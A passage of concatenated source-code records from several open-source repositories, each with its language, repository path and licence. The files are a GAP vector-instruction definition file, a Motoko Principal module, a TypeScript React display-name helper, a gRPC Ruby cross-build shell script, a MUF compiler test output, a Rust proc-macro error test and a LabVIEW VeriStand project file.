Class(vpackhi_8xf, _macro_binop_ev, VecExp_8.binary(), rec( semantic := (in1, in2, p) -> shuffle(in1, in2, [2, 4, 6, 8, 2, 4, 6, 8], 8, 1))); Class(vpacklo2_8xf, _macro_binop_ev, VecExp_8.binary(), rec( semantic := (in1, in2, p) -> shuffle(in1, in2, [1, 3, 1, 3], 8, 2))); Class(vpackhi2_8xf, _macro_binop_ev, VecExp_8.binary(), rec( semantic := (in1, in2, p) -> shuffle(in1, in2, [2, 4, 2, 4], 8, 2))); Class(vtrcx_8xf, VecExp_8.unary(), rec( semantic := (in1, p) -> shuffle(in1, in1, [1, 2, 5, 6, 3, 4, 7, 8], 8, 1), ev := self >> self.t.value(self.semantic(self._vval(1), [])).ev() )); Class(vmulcx_8xf, VecExp_8.binary()); Class(vswapcx_8xf, VecExp_8.unary()); ################################# # Three Op version # ThreeOpFromBinOp( Class(vunpacklo_2xf_cmd, assign_cmd, rec( exp_op := vunpacklo_2xf )), Class(vunpackhi_2xf_cmd, assign_cmd, rec( exp_op := vunpackhi_2xf )), Class(vpacklo_2xf_cmd, assign_cmd, rec( exp_op := vpacklo_2xf )), Class(vpackhi_2xf_cmd, assign_cmd, rec( exp_op := vpackhi_2xf )), Class(vmulcx_2xf_cmd, assign_cmd, rec( exp_op := vmulcx_2xf )), Class(vunpacklo_4xf_cmd, assign_cmd, rec( exp_op := vunpacklo_4xf )), Class(vunpackhi_4xf_cmd, assign_cmd, rec( exp_op := vunpackhi_4xf )), Class(vunpacklo2_4xf_cmd, assign_cmd, rec( exp_op := vunpacklo2_4xf )), Class(vunpackhi2_4xf_cmd, assign_cmd, rec( exp_op := vunpackhi2_4xf )), Class(vpacklo_4xf_cmd, assign_cmd, rec( exp_op := vpacklo_4xf )), Class(vpackhi_4xf_cmd, assign_cmd, rec( exp_op := vpackhi_4xf )), Class(vpacklo2_4xf_cmd, assign_cmd, rec( exp_op := vpacklo2_4xf )), Class(vpackhi2_4xf_cmd, assign_cmd, rec( exp_op := vpackhi2_4xf )), Class(vmulcx_4xf_cmd, assign_cmd, rec( exp_op := vmulcx_4xf )), Class(vunpacklo_8xf_cmd, assign_cmd, rec( exp_op := vunpacklo_8xf )), Class(vunpackhi_8xf_cmd, assign_cmd, rec( exp_op := vunpackhi_8xf )), Class(vunpacklo2_8xf_cmd, assign_cmd, rec( exp_op := vunpacklo2_8xf )), Class(vunpackhi2_8xf_cmd, assign_cmd, rec( exp_op := vunpackhi2_8xf )), Class(vpacklo_8xf_cmd, assign_cmd, rec( exp_op := vpacklo_8xf )), Class(vpackhi_8xf_cmd, assign_cmd, rec( exp_op := vpackhi_8xf )), Class(vpacklo2_8xf_cmd, assign_cmd, rec( exp_op := vpacklo2_8xf )), Class(vpackhi2_8xf_cmd, assign_cmd, rec( exp_op := vpackhi2_8xf )), Class(vmulcx_8xf_cmd, assign_cmd, rec( exp_op := vmulcx_8xf )) ); Class(vswapcx_4xf_cmd, assign_cmd, rec( exp_op := vswapcx_4xf )); Class(vswapcx_2xf_cmd, assign_cmd, rec( exp_op := vswapcx_2xf )); Class(vswapcx_8xf_cmd, assign_cmd, rec( exp_op := vswapcx_8xf )); Class(vtrcx_8xf_cmd, assign_cmd, rec(exp_op := vtrcx_8xf)); Class(vstore_cmd, assign_cmd); Class(vload_cmd, assign_cmd); RewriteRules(ThreeOpRuleSet, rec( assign_to_store := Rule([assign, @(1, nth), @(2)], e -> vstore_cmd(@(1).val.loc, @(1).val.idx, @(2).val)), assign_to_load := Rule([assign, @(1, var), @(2, nth)], e -> vload_cmd(@(1).val, @(2).val.loc, @(2).val.idx)), ));
GAP
4
sr7cb/spiral-software
namespaces/spiral/platforms/macro/code.gi
[ "BSD-2-Clause-FreeBSD" ]
/// IC principals (user and canister smart contract IDs) import Prim "mo:⛔"; import Blob "Blob"; import Hash "Hash"; module { /// Internet Computer principal identifiers. /// Convert to `Blob` for access to bytes. public type Principal = Prim.Types.Principal; /// Conversion. public let fromActor : (a : actor {}) -> Principal = Prim.principalOfActor; /// Conversion. public let toBlob : (p : Principal) -> Blob = Prim.blobOfPrincipal; /// Conversion. public func toText(p : Principal) : Text = debug_show(p); public func hash(principal : Principal) : Hash.Hash = Blob.hash (Prim.blobOfPrincipal(principal)); public func fromText(t : Text) : Principal = fromActor(actor(t)); /// Returns `x == y`. public func equal(x : Principal, y : Principal) : Bool { x == y }; /// Returns `x != y`. public func notEqual(x : Principal, y : Principal) : Bool { x != y }; /// Returns `x < y`. public func less(x : Principal, y : Principal) : Bool { x < y }; /// Returns `x <= y`. public func lessOrEqual(x : Principal, y : Principal) : Bool { x <= y }; /// Returns `x > y`. public func greater(x : Principal, y : Principal) : Bool { x > y }; /// Returns `x >= y`. public func greaterOrEqual(x : Principal, y : Principal) : Bool { x >= y }; /// Returns the order of `x` and `y`. public func compare(x : Principal, y : Principal) : { #less; #equal; #greater } { if (x < y) { #less } else if (x == y) { #equal } else { #greater } }; }
Modelica
5
cybrowl/motoko-base
src/Principal.mo
[ "Apache-2.0" ]
import * as React from 'react'; import { ForwardRef, Memo } from 'react-is'; // Simplified polyfill for IE11 support // https://github.com/JamesMGreene/Function.name/blob/58b314d4a983110c3682f1228f845d39ccca1817/Function.name.js#L3 const fnNameMatchRegex = /^\s*function(?:\s|\s*\/\*.*\*\/\s*)+([^(\s/]*)\s*/; export function getFunctionName(fn: Function): string { const match = `${fn}`.match(fnNameMatchRegex); const name = match && match[1]; return name || ''; } function getFunctionComponentName( Component: React.FunctionComponent | React.ComponentClass, fallback = '', ) { return Component.displayName || Component.name || getFunctionName(Component) || fallback; } function getWrappedName(outerType: any, innerType: any, wrapperName: string) { const functionName = getFunctionComponentName(innerType); return ( outerType.displayName || (functionName !== '' ? `${wrapperName}(${functionName})` : wrapperName) ); } /** * cherry-pick from * https://github.com/facebook/react/blob/769b1f270e1251d9dbdce0fcbd9e92e502d059b8/packages/shared/getComponentName.js * originally forked from recompose/getDisplayName with added IE11 support */ export default function getDisplayName(Component: React.ElementType): string | undefined { if (Component == null) { return undefined; } if (typeof Component === 'string') { return Component; } if (typeof Component === 'function') { return getFunctionComponentName(Component, 'Component'); } // TypeScript can't have components as objects but they exist in the form of `memo` or `Suspense` if (typeof Component === 'object') { switch ((Component as any).$$typeof) { case ForwardRef: return getWrappedName(Component, (Component as any).render, 'ForwardRef'); case Memo: return getWrappedName(Component, (Component as any).type, 'memo'); default: return undefined; } } return undefined; }
TypeScript
5
omidtajik/material-ui
packages/material-ui-utils/src/getDisplayName.ts
[ "MIT" ]
#!/bin/bash # Copyright 2015 gRPC authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. set -ex rm -rf ~/.rake-compiler CROSS_RUBY="$(pwd)/$(mktemp tmpfile.XXXXXXXX)" curl https://raw.githubusercontent.com/rake-compiler/rake-compiler/v1.1.1/tasks/bin/cross-ruby.rake > "$CROSS_RUBY" # See https://github.com/grpc/grpc/issues/12161 for verconf.h patch details patch "$CROSS_RUBY" << EOF --- cross-ruby.rake 2021-03-05 12:04:09.898286632 -0800 +++ patched 2021-03-05 12:05:35.594318962 -0800 @@ -111,10 +111,11 @@ "--host=#{MINGW_HOST}", "--target=#{MINGW_TARGET}", "--build=#{RUBY_BUILD}", - '--enable-shared', + '--enable-static', + '--disable-shared', '--disable-install-doc', + '--without-gmp', '--with-ext=', - 'LDFLAGS=-pipe -s', ] # Force Winsock2 for Ruby 1.8, 1.9 defaults to it @@ -130,6 +131,7 @@ # make file "#{build_dir}/ruby.exe" => ["#{build_dir}/Makefile"] do |t| chdir File.dirname(t.prerequisites.first) do + sh "test -s verconf.h || rm -f verconf.h" # if verconf.h has size 0, make sure it gets re-built by make sh MAKE end end EOF MAKE="make -j8" # Install ruby 3.0.0 for rake-compiler # Download ruby 3.0.0 sources outside of the cross-ruby.rake file, since the # latest rake-compiler/v1.1.1 cross-ruby.rake file requires tar.bz2 source # files. # TODO(apolcyn): remove this hack when tar.bz2 sources are available for ruby # 3.0.0 in https://ftp.ruby-lang.org/pub/ruby/3.0/. Also see # https://stackoverflow.com/questions/65477613/rvm-where-is-ruby-3-0-0. set +x # rvm commands are very verbose source ~/.rvm/scripts/rvm echo "rvm use 3.0.0" rvm use 3.0.0 set -x RUBY_3_0_0_TAR="${HOME}/.rake-compiler/sources/ruby-3.0.0.tar.gz" mkdir -p "$(dirname $RUBY_3_0_0_TAR)" curl -L "https://ftp.ruby-lang.org/pub/ruby/3.0/$(basename $RUBY_3_0_0_TAR)" -o "$RUBY_3_0_0_TAR" ccache -c ruby --version | grep 'ruby 3.0.0' rake -f "$CROSS_RUBY" cross-ruby VERSION=3.0.0 HOST=x86_64-darwin11 MAKE="$MAKE" SOURCE="$RUBY_3_0_0_TAR" echo "installed ruby 3.0.0 build targets" # Install ruby 2.7.0 for rake-compiler set +x echo "rvm use 2.7.0" rvm use 2.7.0 set -x ruby --version | grep 'ruby 2.7.0' ccache -c rake -f "$CROSS_RUBY" cross-ruby VERSION=2.7.0 HOST=x86_64-darwin11 MAKE="$MAKE" echo "installed ruby 2.7.0 build targets" # Install ruby 2.4-2.6 for rake-compiler set +x echo "rvm use 2.5.0" rvm use 2.5.0 set -x ruby --version | grep 'ruby 2.5.0' for v in 2.6.0 2.5.0 2.4.0 ; do ccache -c rake -f "$CROSS_RUBY" cross-ruby VERSION="$v" HOST=x86_64-darwin11 MAKE="$MAKE" echo "installed ruby $v build targets" done sed 's/x86_64-darwin-11/universal-darwin/' ~/.rake-compiler/config.yml > "$CROSS_RUBY" mv "$CROSS_RUBY" ~/.rake-compiler/config.yml
Shell
4
warlock135/grpc
tools/distrib/build_ruby_environment_macos.sh
[ "Apache-2.0" ]
( Generated from test_comprehensions_in.muv by the MUV compiler. ) ( https://github.com/revarbat/pymuv ) : _main[ _arg -- ret ] var _k var _v { 3 4 5 6 7 8 9 }list var! _mylist { }list _mylist @ foreach _v ! pop _v @ _v @ * swap []<- repeat var! _squares { }list _mylist @ foreach _v ! pop _v @ 2 % if _v @ swap []<- then repeat var! _odds { }list _mylist @ foreach _v ! pop _v @ 2 % not if _v @ swap []<- then repeat var! _evens { "a" 1 "b" 2 "c" 3 "d" 4 }dict var! _mydict { }dict _mydict @ foreach _v ! _k ! _k @ _v @ _v @ * rot rot ->[] repeat var! _squarevals { }dict _mydict @ foreach _v ! _k ! _k @ "b" strcmp 0 > if _k @ _v @ _v @ * rot rot ->[] then repeat var! _foo { }dict _mydict @ foreach _v ! _k ! _v @ 2 > not if _k @ _v @ _v @ * rot rot ->[] then repeat var! _bar var _obj { }list loc @ contents_array foreach _obj ! pop _obj @ player? dup if pop _obj @ awake? then if _obj @ name swap []<- then repeat var! _listeners 0 ; : __start "me" match me ! me @ location loc ! trig trigger ! _main ;
MUF
3
revarbat/pymuv
tests/test_comprehensions_cmp.muf
[ "MIT" ]
//! Attributes producing expressions in invalid locations // aux-build:attr-stmt-expr.rs #![feature(proc_macro_hygiene)] #![feature(stmt_expr_attributes)] extern crate attr_stmt_expr; use attr_stmt_expr::{duplicate, no_output}; fn main() { let _ = #[no_output] "Hello, world!"; //~^ ERROR expected expression, found end of macro arguments let _ = #[duplicate] "Hello, world!"; //~^ ERROR macro expansion ignores token `,` and any following let _ = { #[no_output] "Hello, world!" }; let _ = { #[duplicate] //~^ ERROR macro expansion ignores token `,` and any following "Hello, world!" }; }
Rust
4
Eric-Arellano/rust
src/test/ui/proc-macro/attr-invalid-exprs.rs
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
<?xml version='1.0' encoding='UTF-8'?> <Project Type="Project" LVVersion="19008000"> <Item Name="My Computer" Type="My Computer"> <Property Name="IOScan.Faults" Type="Str"></Property> <Property Name="IOScan.NetVarPeriod" Type="UInt">100</Property> <Property Name="IOScan.NetWatchdogEnabled" Type="Bool">false</Property> <Property Name="IOScan.Period" Type="UInt">10000</Property> <Property Name="IOScan.PowerupMode" Type="UInt">0</Property> <Property Name="IOScan.Priority" Type="UInt">9</Property> <Property Name="IOScan.ReportModeConflict" Type="Bool">true</Property> <Property Name="IOScan.StartEngineOnDeploy" Type="Bool">false</Property> <Property Name="server.app.propertiesEnabled" Type="Bool">true</Property> <Property Name="server.control.propertiesEnabled" Type="Bool">true</Property> <Property Name="server.tcp.enabled" Type="Bool">false</Property> <Property Name="server.tcp.port" Type="Int">0</Property> <Property Name="server.tcp.serviceName" Type="Str">My Computer/VI Server</Property> <Property Name="server.tcp.serviceName.default" Type="Str">My Computer/VI Server</Property> <Property Name="server.vi.callsEnabled" Type="Bool">true</Property> <Property Name="server.vi.propertiesEnabled" Type="Bool">true</Property> <Property Name="specify.custom.address" Type="Bool">false</Property> <Item Name="Addon" Type="Folder"> <Item Name="Support Files" Type="Folder"> <Item Name="Glyphs" Type="Folder" URL="../Addon/Support Files/Glyphs"> <Property Name="NI.DISK" Type="Bool">true</Property> </Item> <Item Name="Help" Type="Folder" URL="../Addon/Support Files/Help"> <Property Name="NI.DISK" Type="Bool">true</Property> </Item> <Item Name="Quick Start Documentation" Type="Folder" URL="../Addon/Support Files/Quick Start Documentation"> <Property Name="NI.DISK" Type="Bool">true</Property> </Item> </Item> <Item Name="Support Libraries" Type="Folder"> <Item Name="Protections.lvlibp" Type="LVLibp" URL="../Addon/Support Libraries/Protections.lvlibp"> <Item Name="Checksum U8.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protections.lvlibp/Checksum U8/Checksum U8.lvclass"/> <Item Name="Checksum U16.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protections.lvlibp/Checksum U16/Checksum U16.lvclass"/> <Item Name="Checksum U32.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protections.lvlibp/Checksum U32/Checksum U32.lvclass"/> <Item Name="CRC-32.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protections.lvlibp/CRC-32/CRC-32.lvclass"/> <Item Name="Error Cluster From Error Code.vi" Type="VI" URL="../Addon/Support Libraries/Protections.lvlibp/1abvi3w/vi.lib/Utility/error.llb/Error Cluster From Error Code.vi"/> <Item Name="Protection.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protections.lvlibp/Parent Protection/Protection.lvclass"/> </Item> <Item Name="Protocols.lvlibp" Type="LVLibp" URL="../Addon/Support Libraries/Protocols.lvlibp"> <Item Name="AK" Type="Folder"> <Item Name="AK RS-xxx.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/AK RS-xxx/AK RS-xxx.lvclass"/> <Item Name="AK TCP.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/AK TCP/AK TCP.lvclass"/> <Item Name="Format AK Command.vi" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/AK/Format AK Command.vi"/> <Item Name="Format AK Response.vi" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/AK/Format AK Response.vi"/> </Item> <Item Name="Protocol Parent" Type="Folder"> <Item Name="Protocol Parent.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/Protocol Parent/Protocol Parent.lvclass"/> </Item> <Item Name="RS-xxx" Type="Folder"> <Item Name="RS-xxx.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/RS-xxx/RS-xxx.lvclass"/> </Item> <Item Name="RS-xxx to GPIB ConvBox" Type="Folder"> <Item Name="RS-xxx to GPIB ConvBox.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/RS-xxx to GPIB ConvBox/RS-xxx to GPIB ConvBox.lvclass"/> </Item> <Item Name="TCP" Type="Folder"> <Item Name="TCP.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/TCP/TCP.lvclass"/> </Item> <Item Name="UDP" Type="Folder"> <Item Name="UDP.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/UDP/UDP.lvclass"/> </Item> <Item Name="VISA" Type="Folder"> <Item Name="VISA.lvclass" Type="LVClass" URL="../Addon/Support Libraries/Protocols.lvlibp/VISA/VISA.lvclass"/> </Item> <Item Name="Clear Errors.vi" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/1abvi3w/vi.lib/Utility/error.llb/Clear Errors.vi"/> <Item Name="Error Cluster From Error Code.vi" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/1abvi3w/vi.lib/Utility/error.llb/Error Cluster From Error Code.vi"/> <Item Name="GPIB Status Boolean Array.ctl" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/1abvi3w/vi.lib/Instr/_visa.llb/GPIB Status Boolean Array.ctl"/> <Item Name="nirviCommon.vi" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/1abvi3w/vi.lib/express/rvi/timingcommon/nirviCommon.vi"/> <Item Name="Space Constant.vi" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/1abvi3w/vi.lib/dlg_ctls.llb/Space Constant.vi"/> <Item Name="VISA Configure Serial Port (Instr).vi" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/1abvi3w/vi.lib/Instr/_visa.llb/VISA Configure Serial Port (Instr).vi"/> <Item Name="VISA Flush IO Buffer Mask.ctl" Type="VI" URL="../Addon/Support Libraries/Protocols.lvlibp/1abvi3w/vi.lib/Instr/_visa.llb/VISA Flush IO Buffer Mask.ctl"/> </Item> </Item> <Item Name="Custom Device Instrument Addon.xml" Type="Document" URL="../Addon/Custom Device Instrument Addon.xml"/> <Item Name="Instrument Addon Engine.lvlib" Type="Library" URL="../Addon/Addon Engine/Instrument Addon Engine.lvlib"/> <Item Name="Instrument Addon Shared.lvlib" Type="Library" URL="../Addon/Addon Shared/Instrument Addon Shared.lvlib"/> <Item Name="Instrument Addon System Explorer.lvlib" Type="Library" URL="../Addon/Addon System Explorer/Instrument Addon System Explorer.lvlib"/> </Item> <Item Name="APIs" Type="Folder"> <Item Name="Instrument Host Automation API.lvlib" Type="Library" URL="../APIs/Host Automation API/Instrument Host Automation API.lvlib"/> </Item> <Item Name="UIs" Type="Folder"> <Item Name="Instrument Workspace Objects.lvlib" Type="Library" URL="../UIs/Workspace Object/Instrument Workspace Objects.lvlib"/> <Item Name="Instrument Workspace Shared.lvlib" Type="Library" URL="../UIs/Workspace Shared/Instrument Workspace Shared.lvlib"/> <Item Name="Instrument Workspace Tool.lvlib" Type="Library" URL="../UIs/Workspace Tool/Instrument Workspace Tool.lvlib"/> </Item> <Item Name="Utilities" Type="Folder"> <Item Name="Copy .LLB to NI VeriStand dir.vi" Type="VI" URL="../Utilities/Copy .LLB to NI VeriStand dir.vi"/> <Item Name="LLB Pre-Build CHM Build.vi" Type="VI" URL="../Utilities/LLB Pre-Build CHM Build.vi"/> </Item> <Item Name="Dependencies" Type="Dependencies"> <Item Name="user.lib" Type="Folder"> <Item Name="Build Error Cluster__ogtk.vi" Type="VI" URL="/&lt;userlib&gt;/_OpenG.lib/error/error.llb/Build Error Cluster__ogtk.vi"/> <Item Name="Get Header from TD__ogtk.vi" Type="VI" URL="/&lt;userlib&gt;/_OpenG.lib/lvdata/lvdata.llb/Get Header from TD__ogtk.vi"/> <Item Name="Get PString__ogtk.vi" Type="VI" URL="/&lt;userlib&gt;/_OpenG.lib/lvdata/lvdata.llb/Get PString__ogtk.vi"/> <Item Name="Get Strings from Enum TD__ogtk.vi" Type="VI" URL="/&lt;userlib&gt;/_OpenG.lib/lvdata/lvdata.llb/Get Strings from Enum TD__ogtk.vi"/> <Item Name="Get Strings from Enum__ogtk.vi" Type="VI" URL="/&lt;userlib&gt;/_OpenG.lib/lvdata/lvdata.llb/Get Strings from Enum__ogtk.vi"/> <Item Name="Type Descriptor Enumeration__ogtk.ctl" Type="VI" URL="/&lt;userlib&gt;/_OpenG.lib/lvdata/lvdata.llb/Type Descriptor Enumeration__ogtk.ctl"/> <Item Name="Type Descriptor Header__ogtk.ctl" Type="VI" URL="/&lt;userlib&gt;/_OpenG.lib/lvdata/lvdata.llb/Type Descriptor Header__ogtk.ctl"/> <Item Name="Type Descriptor__ogtk.ctl" Type="VI" URL="/&lt;userlib&gt;/_OpenG.lib/lvdata/lvdata.llb/Type Descriptor__ogtk.ctl"/> <Item Name="Variant to Header Info__ogtk.vi" Type="VI" URL="/&lt;userlib&gt;/_OpenG.lib/lvdata/lvdata.llb/Variant to Header Info__ogtk.vi"/> </Item> <Item Name="vi.lib" Type="Folder"> <Item Name="8.6CompatibleGlobalVar.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/config.llb/8.6CompatibleGlobalVar.vi"/> <Item Name="Advanced System Definition.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/NI VeriStand Advanced SysDef API/SysDef API/Advanced System Definition.lvlib"/> <Item Name="AMC.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/AMC/AMC.lvlib"/> <Item Name="BuildHelpPath.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/BuildHelpPath.vi"/> <Item Name="Check if File or Folder Exists.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/libraryn.llb/Check if File or Folder Exists.vi"/> <Item Name="Check Special Tags.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Check Special Tags.vi"/> <Item Name="CHM Generator.lvclass" Type="LVClass" URL="/&lt;vilib&gt;/NI/Compiled HTML Menu Tool/CHM Generator/CHM Generator.lvclass"/> <Item Name="Clear Errors.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Clear Errors.vi"/> <Item Name="cluster_Graph Handler Message.ctl" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/cluster_Graph Handler Message.ctl"/> <Item Name="cluster_Graph Plot Settings.ctl" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/cluster_Graph Plot Settings.ctl"/> <Item Name="cluster_Graph Scale Settings.ctl" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/cluster_Graph Scale Settings.ctl"/> <Item Name="cluster_Screen Item Settings.ctl" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/cluster_Screen Item Settings.ctl"/> <Item Name="Compare Two Paths.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/libraryn.llb/Compare Two Paths.vi"/> <Item Name="Convert property node font to graphics font.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Convert property node font to graphics font.vi"/> <Item Name="Custom Device API.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI VeriStand/Custom Device API/Custom Device API.lvlib"/> <Item Name="Custom Device Utility Library.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI VeriStand/Custom Device Tools/Custom Device Utility Library/Custom Device Utility Library.lvlib"/> <Item Name="Data Access Engine.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/NIVS Inline Async API/_Data Access Engine/Data Access Engine.lvlib"/> <Item Name="Data Access System Explorer.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/NIVS Inline Async API/_Data Access System Explorer/Data Access System Explorer.lvlib"/> <Item Name="Details Display Dialog.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Details Display Dialog.vi"/> <Item Name="DialogType.ctl" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/DialogType.ctl"/> <Item Name="DialogTypeEnum.ctl" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/DialogTypeEnum.ctl"/> <Item Name="enum_Display Template Handler Minimal To Widget Msg.ctl" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/enum_Display Template Handler Minimal To Widget Msg.ctl"/> <Item Name="enum_Display Template Handler Minimal To Workspace.ctl" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/enum_Display Template Handler Minimal To Workspace.ctl"/> <Item Name="enum_Graph Handler Message.ctl" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/enum_Graph Handler Message.ctl"/> <Item Name="Error Cluster From Error Code.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Error Cluster From Error Code.vi"/> <Item Name="Error Code Database.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Error Code Database.vi"/> <Item Name="ErrWarn.ctl" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/ErrWarn.ctl"/> <Item Name="eventvkey.ctl" Type="VI" URL="/&lt;vilib&gt;/event_ctls.llb/eventvkey.ctl"/> <Item Name="ex_CorrectErrorChain.vi" Type="VI" URL="/&lt;vilib&gt;/express/express shared/ex_CorrectErrorChain.vi"/> <Item Name="Find Tag.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Find Tag.vi"/> <Item Name="Format Message String.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Format Message String.vi"/> <Item Name="General Error Handler Core CORE.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/General Error Handler Core CORE.vi"/> <Item Name="General Error Handler.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/General Error Handler.vi"/> <Item Name="Get File Extension.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/libraryn.llb/Get File Extension.vi"/> <Item Name="Get LV Class Default Value.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/LVClass/Get LV Class Default Value.vi"/> <Item Name="Get String Text Bounds.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Get String Text Bounds.vi"/> <Item Name="Get System Directory.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/sysdir.llb/Get System Directory.vi"/> <Item Name="Get Text Rect.vi" Type="VI" URL="/&lt;vilib&gt;/picture/picture.llb/Get Text Rect.vi"/> <Item Name="GetHelpDir.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/GetHelpDir.vi"/> <Item Name="GetRTHostConnectedProp.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/GetRTHostConnectedProp.vi"/> <Item Name="imagedata.ctl" Type="VI" URL="/&lt;vilib&gt;/picture/picture.llb/imagedata.ctl"/> <Item Name="ImportExport.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/NI VeriStand Custom Device Import and Export Tool/ImportExport.lvlib"/> <Item Name="Keyed Value Tree.lvclass" Type="LVClass" URL="/&lt;vilib&gt;/NI/Compiled HTML Menu Tool/Keyed Value Tree/Keyed Value Tree.lvclass"/> <Item Name="List Directory and LLBs.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/libraryn.llb/List Directory and LLBs.vi"/> <Item Name="Load CHM Page.vi" Type="VI" URL="/&lt;vilib&gt;/NI/Compiled HTML Menu Tool/Load CHM Page.vi"/> <Item Name="Longest Line Length in Pixels.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Longest Line Length in Pixels.vi"/> <Item Name="LVBoundsTypeDef.ctl" Type="VI" URL="/&lt;vilib&gt;/Utility/miscctls.llb/LVBoundsTypeDef.ctl"/> <Item Name="LVComboBoxStrsAndValuesArrayTypeDef.ctl" Type="VI" URL="/&lt;vilib&gt;/Utility/miscctls.llb/LVComboBoxStrsAndValuesArrayTypeDef.ctl"/> <Item Name="LVNumericRepresentation.ctl" Type="VI" URL="/&lt;vilib&gt;/numeric/LVNumericRepresentation.ctl"/> <Item Name="LVRectTypeDef.ctl" Type="VI" URL="/&lt;vilib&gt;/Utility/miscctls.llb/LVRectTypeDef.ctl"/> <Item Name="MergeError.vi" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Execution/Shared/MergeError.vi"/> <Item Name="NI STM.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/STM/NI STM.lvlib"/> <Item Name="NI VeriStand Addon Network Comm Shared.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/NI VeriStand Addon Network Comm/Shared/NI VeriStand Addon Network Comm Shared.lvlib"/> <Item Name="NI VeriStand Addon Network Comm.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/NI VeriStand Addon Network Comm/Engine/NI VeriStand Addon Network Comm.lvlib"/> <Item Name="NI_FileType.lvlib" Type="Library" URL="/&lt;vilib&gt;/Utility/lvfile.llb/NI_FileType.lvlib"/> <Item Name="NI_FTP.lvlib" Type="Library" URL="/&lt;vilib&gt;/FTP/NI_FTP.lvlib"/> <Item Name="NI_LVConfig.lvlib" Type="Library" URL="/&lt;vilib&gt;/Utility/config.llb/NI_LVConfig.lvlib"/> <Item Name="NI_PackedLibraryUtility.lvlib" Type="Library" URL="/&lt;vilib&gt;/Utility/LVLibp/NI_PackedLibraryUtility.lvlib"/> <Item Name="NI_SystemLogging.lvlib" Type="Library" URL="/&lt;vilib&gt;/Utility/SystemLogging/NI_SystemLogging.lvlib"/> <Item Name="NI_VS UI Single Node Browser.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI VeriStand/UI Controls/Single Node Browser/NI_VS UI Single Node Browser.lvlib"/> <Item Name="NI_VS Workspace ExecutionAPI.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI VeriStand/Execution/Workspace/NI_VS Workspace ExecutionAPI.lvlib"/> <Item Name="nisyscfg.lvlib" Type="Library" URL="/&lt;vilib&gt;/nisyscfg/nisyscfg.lvlib"/> <Item 